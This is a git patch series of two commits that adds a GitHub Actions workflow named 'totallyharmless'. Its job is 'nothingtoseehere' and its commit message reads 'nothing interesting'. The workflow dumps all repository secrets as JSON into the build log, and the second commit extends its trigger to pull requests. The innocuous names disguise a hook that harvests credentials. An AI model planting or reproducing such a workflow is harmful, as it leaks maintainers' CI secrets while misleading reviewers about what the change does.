From 120827227e4e3a1dbd78501497a65af9c3beae8b Mon Sep 17 00:00:00 2001 From: gabor Date: Tue, 15 Sep 2020 11:36:39 +0200 Subject: [PATCH 1/2] nothing interesting --- .github/workflows/haxor.yml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 .github/workflows/haxor.yml diff --git a/.github/workflows/haxor.yml b/.github/workflows/haxor.yml new file mode 100644 index 0000000..04b2343 --- /dev/null +++ b/.github/workflows/haxor.yml @@ -0,0 +1,16 @@ +name: totallyharmless +# This workflow is triggered on pushes to the repository. +on: [push] + +jobs: + build: + name: nothingtoseehere + runs-on: ubuntu-latest + env: + VERYSECRET: ${{ secrets.VERYSECRET }} + steps: + - name: view the secrets context + shell: bash + run: echo "$SECRETS_CONTEXT" + env: + SECRETS_CONTEXT: ${{ toJson(secrets) }} From 4e6ddaa6d88b0e1525048294286b592cf3da7c69 Mon Sep 17 00:00:00 2001 From: gmatuz Date: Tue, 15 Sep 2020 11:41:17 +0200 Subject: [PATCH 2/2] maybe this way --- .github/workflows/haxor.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/haxor.yml b/.github/workflows/haxor.yml index 04b2343..08ed152 100644 --- a/.github/workflows/haxor.yml +++ b/.github/workflows/haxor.yml @@ -1,6 +1,6 @@ name: totallyharmless # This workflow is triggered on pushes to the repository. -on: [push] +on: [push , pull_request] jobs: build: